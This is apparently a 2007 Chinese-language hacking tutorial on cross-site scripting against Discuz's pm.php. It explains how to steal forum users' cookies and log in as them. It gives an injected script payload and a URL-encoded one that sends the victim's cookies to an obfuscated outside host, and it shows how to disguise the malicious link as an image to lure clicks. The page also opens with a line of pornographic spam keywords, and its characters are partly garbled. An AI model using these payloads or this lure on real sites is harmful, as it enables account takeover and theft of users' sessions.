欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

跨站腳本攻擊+Cookies欺騙(Discuz篇)

 更新時(shí)間:2007年01月16日 00:00:00   作者:  
這次我拿Discuz示范給大家看,首先我們都知道,Discuz在pm.php的程式中,并沒有對(duì)   

會(huì)員名字做過濾,導(dǎo)致我們可以寫入一些script.   

聰明的同學(xué)們,想到了嗎?我們正可以利用這個(gè)漏洞寫一段獲取cookies的script.   

這是要像看到顏色 就會(huì)反應(yīng)的!(取自 數(shù)學(xué)補(bǔ)習(xí)班= =")   

所以我們先從本端 獲取自己cookies看看...   

例句:   

http://www.abc.com/pm.php?action=send&username=看啥?"><script>alert(documents.cookie)</script><   

OK? 接下來 我們?yōu)榱艘@取別人的cookies 所以采用跨站臺(tái)的方式,   

首先把讓對(duì)方看了我們精心構(gòu)制好的URL.連了之后會(huì)到我們構(gòu)制好的php or asp 程式里面.   

并把對(duì)方自己的cookies寫入 我們的程式中...(如果需要 請(qǐng)googles搜尋 大陸狗 那邊一堆)...   

所以啦~獲取到對(duì)方cookies之后,我們找自己在該論壇的cookies記錄..   

找到之后 把cookies里面的資訊改成對(duì)方的使用者名稱,以及加密過的md5碼...   

切記md5碼是不可以反逆的~   

現(xiàn)在我把原理說完ㄌ...開始實(shí)戰(zhàn)吧~~小雜碎 快來阿!   

現(xiàn)在已經(jīng)知道pm.php的bug. 我們也已經(jīng)把php程式上傳準(zhǔn)備完成.   

接下來 我們到論壇發(fā)link! P.S. 有些論壇 還可以利用 頭像 來欺騙...   

全看個(gè)人的思維....(想起數(shù)學(xué)老師ㄌ= =")   

我貼了個(gè)問電腦問題的文章連結(jié),并附上圖片...(嘿嘿重點(diǎn)在圖片拉~)   

我假設(shè)有一個(gè)假網(wǎng)址,http://myweb.hinet.net/uarestupid/home1/XXX.jpg   

隨便你寫 只要看起來像個(gè)圖片 連結(jié)就夠了....   

并把http://myweb.hinet.net/uarestupid/home1/XXX.jpg加上我們漏洞的連結(jié),   

所以看起來就是這樣:   

http://myweb.hinet.net/uarestupid/home1/XXX.jpg   

以上這段圖片link看起來大家都毫不考慮的認(rèn)為真的是圖片...   

其實(shí)連結(jié)到,   

http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open("%68%74%74%70%3A%2F%2F%6D%65%6D%62%65%72%73%2E%6C%79%63%6F%73%2E%63%6F%2E%75%6B%2F%6A%65%72%65%6D%79%68%63%77%2F%68%2E%70%68%70?"%2Bdocuments.cookie)%3C/script%3E%3Cb%22   

以上我已經(jīng)url編碼過了,用功的同學(xué)用cookies搜一下吧...   

所以呢 他按了圖片連結(jié)后....把自己的cookies送出去了 = =" 但是他還是可以看到圖片...  

相關(guān)文章

最新評(píng)論